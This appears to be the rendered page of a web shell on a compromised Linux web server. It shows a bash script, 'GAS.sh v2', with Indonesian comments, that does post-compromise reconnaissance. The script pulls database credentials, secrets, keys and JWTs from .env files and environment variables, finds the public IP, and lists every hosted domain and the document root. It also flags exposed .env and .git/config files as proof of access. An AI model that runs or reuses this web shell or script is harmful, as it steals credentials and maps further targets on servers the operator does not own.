|
Server IP : 167.86.112.62 / Your IP : 216.73.216.27 Web Server : Apache System : Linux vps.hostingboliviaonline.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : hesfmvaw ( 1186) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0711) : /home/hesfmvaw/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
#!/bin/bash
# ================================================
# GAS.sh v2 - Self Server Analyzer + DAFTAR DOMAIN
# Output: secrets → ip → domain → host → DAFTAR DOMAIN → doc_root → full url files proof signature access browsers
# ================================================
echo "🚀 GAS ANALYSIS REPORT v2 - $(date)"
echo "=================================================="
# 1. SECRETS
echo -e "\n🔑 SECRETS"
if [ -f .env ]; then
echo "✅ .env ditemukan:"
grep -E '^(DB_|APP_|SECRET|KEY|PASSWORD)' .env 2>/dev/null || echo " (tidak ada credential)"
else
echo "ℹ️ Tidak ada .env"
fi
echo "Env penting:"
env | grep -E '^(DB_|APP_|SECRET|KEY|PASSWORD|JWT)' 2>/dev/null || echo " (kosong)"
# 2. IP
echo -e "\n🌐 IP"
LOCAL_IP=$(hostname -I | awk '{print $1}')
PUBLIC_IP=$(curl -s -4 https://ifconfig.me 2>/dev/null || echo "N/A")
echo "Local IP : $LOCAL_IP"
echo "Public IP : $PUBLIC_IP"
# 3. DOMAIN (utama)
echo -e "\n🌍 DOMAIN UTAMA"
DOMAIN=$(hostname -f)
echo "Hostname/FQDN: $DOMAIN"
# 4. DAFTAR DOMAIN YANG DI-HOSTING (NEW!)
echo -e "\n📋 DAFTAR DOMAIN / VIRTUAL HOSTS"
if command -v apache2ctl >/dev/null 2>&1; then
echo "🟢 Apache Virtual Hosts:"
apache2ctl -S 2>/dev/null | grep -E 'VirtualHost|namevhost|ServerName|ServerAlias' | sed 's/^/ /'
elif command -v nginx >/dev/null 2>&1; then
echo "🟢 Nginx Server Names:"
nginx -T 2>/dev/null | grep -E 'server_name ' | sed 's/^/ /' | sort | uniq -c | sed 's/^/ /'
else
echo "❌ Tidak terdeteksi Apache atau Nginx"
fi
echo -e "\n📌 Daftar Domain Lengkap (klik langsung):"
if command -v apache2ctl >/dev/null 2>&1; then
apache2ctl -S 2>/dev/null | grep -o 'namevhost .*' | awk '{print $2}' | while read dom; do
echo " → http://$dom"
echo " → http://$PUBLIC_IP (via IP)"
done
elif command -v nginx >/dev/null 2>&1; then
nginx -T 2>/dev/null | grep -o 'server_name .*;' | sed 's/server_name //;s/;//' | tr ' ' '\n' | grep -v '^$' | sort | uniq | while read dom; do
[[ $dom != "*" ]] && echo " → http://$dom"
done
fi
# 5. HOST
echo -e "\n🖥️ HOST"
echo "Hostname : $(hostname)"
echo "OS : $(uname -a)"
echo "Uptime : $(uptime -p)"
# 6. DOC_ROOT
echo -e "\n📁 DOC_ROOT"
if command -v apache2ctl >/dev/null 2>&1; then
DOCROOT=$(apache2ctl -S 2>&1 | grep -o 'DocumentRoot .*' | awk '{print $2}' | head -n1)
elif command -v nginx >/dev/null 2>&1; then
DOCROOT=$(nginx -T 2>&1 | grep -o 'root .*;' | awk '{print $2}' | tr -d ';' | head -n1)
else
DOCROOT="/var/www/html"
fi
echo "Document Root: $DOCROOT"
# 7. FULL URL + FILES + PROOF
echo -e "\n🔗 FULL URL + FILES + PROOF"
FULL_URL="http://$DOMAIN"
echo "Base URL : $FULL_URL"
echo -e "\n📄 Proof Files:"
for file in .env .git/config robots.txt .htaccess sitemap.xml; do
if [ -f "$DOCROOT/$file" ]; then
echo "✅ $FULL_URL/$file ← TERDETEKSI"
else
echo " $FULL_URL/$file"
fi
done
# 8. SIGNATURE
echo -e "\n🔍 SIGNATURE"
curl -s -I "$FULL_URL" 2>/dev/null | head -n 10 | sed 's/^/ /'
# 9. ACCESS BROWSERS
echo -e "\n🌐 ACCESS BROWSERS"
echo "1. $FULL_URL"
echo "2. http://$PUBLIC_IP"
echo "3. $FULL_URL/.env"
echo "4. $FULL_URL/robots.txt"
echo "5. $FULL_URL/.git/config ← bahaya kalau terbuka!"
echo -e "\n✅ ANALISA SELESAI - Semua domain sudah terlist!"